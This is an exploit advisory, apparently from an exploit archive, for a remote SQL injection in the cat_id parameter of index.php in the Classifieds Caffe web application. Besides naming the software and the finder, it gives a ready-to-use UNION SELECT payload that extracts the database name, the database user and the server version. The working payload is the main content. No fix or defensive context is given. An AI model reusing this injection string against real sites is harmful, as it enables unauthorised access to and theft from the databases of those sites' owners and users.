id: 2884
date: 04/14/2008
title: Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability
author: JosS
cves: 

================================================================
Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability
================================================================



[+] Info:

[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS


[+] Exploit:

[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*



#  0day.today [2023-03-22]  #